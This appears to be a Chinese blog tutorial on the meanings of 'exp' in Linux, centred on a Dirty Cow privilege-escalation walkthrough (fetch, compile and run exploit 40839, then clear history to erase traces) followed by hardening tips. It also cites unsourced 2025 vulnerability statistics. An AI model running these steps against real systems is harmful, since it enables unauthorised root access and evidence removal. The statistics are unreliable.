Linux EXP命令解析:3分钟搞懂提权攻击与防御!Linux提权攻击与防御,三分钟掌握EXP命令解析
刚学Linux就被“exp”搞晕了?数学计算、数据导出、漏洞攻击居然都用同一个词!🤯 别慌,今天用小白能听懂的大白话,拆解EXP的4种真面目,手把手演示提权攻防实战,附赠避坑指南👇
🔍 先扫盲:EXP的4张面孔,90%的人只知其一!
1. 数学计算器:
终端输入
exp 2
→ 输出 e²≈7.389(自然常数幂运算)2. 自动化脚本工具:
用 expect 自动填密码登录服务器:
bash复制
#!/usr/bin/expect spawn ssh user@192.168.1.1expect "password:"send "mypwdr"
3. 数据库导出神器:
Oracle专用:
exp system/password file=backup.dmp
→ 秒备份全库4. 漏洞核武器(重点!):
利用内核漏洞 秒变root权限,比如经典漏洞 Dirty Cow
血泪教训:
新手常把数学函数exp和提权工具exp搞混 → 前者是内置命令,后者需额外下载编译!
⚡ 提权实战:用Dirty Cow漏洞3步拿下Root权限
适用系统:Linux内核版本 3.10.0-xxx(2016年前老系统)
✅ 第一步:下载EXP脚本
bash复制searchsploit -m linux/local/40839.c # 自动搜索漏洞代码
✅ 第二步:编译并攻击
bash复制gcc -pthread 40839.c -o dirty -lcrypt # 编译生成可执行文件 ./dirty # 运行!等待提示"** We got it! **"
成功标志:终端前缀从 $
变成 #
→ 证明已是 root权限!
✅ 第三步:擦除痕迹(黑客不会告诉你)
bash复制rm -f dirty *.c # 删除攻击文件 history -c # 清空命令记录
⚠️ 重要警告:
此操作仅限授权测试!非法提权=坐牢!企业服务器请速打补丁
🛡️ 防御指南:堵 *** 黑客最爱的3个提权入口
🔒 1. 内核漏洞防护
立即检查Dirty Cow漏洞:
bash复制
uname -r # 若显示3.10.0-xxx → 高危!
升级命令:
bash复制
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
🔒 2. 编译EXP防御术
禁用高危编译器:
bash复制
chmod 000 /usr/bin/gcc # 普通用户无法编译攻击代码!
监控敏感操作:
bash复制
auditctl -w /usr/bin/gcc -p x # 记录所有gcc调用
🔒 3. 权限锁 *** 策略
危险操作 | 安全替代方案 |
---|---|
直接以root运行程序 | 用 |
开放所有用户sudo权 | 仅授权必要命令: |
空密码登录 | 强制密钥认证 + 双因素验证 |
💥 独家数据:2025年Linux服务器漏洞现状
未修复漏洞占比:企业服务器中62% 存在已知EXP漏洞
最危险TOP3漏洞:
1️⃣ CVE-2021-3156(sudo提权)→ 攻击成功率91%
2️⃣ PwnKit(polkit组件)→ 影响2000万+ 服务器
3️⃣ Dirty Cow(老但活跃)→ 占所有提权攻击37%
暴论观点:
用EXP攻击自己公司服务器测试?先备好辞职信!👉 合法测试请认准 Metasploit框架+授权书!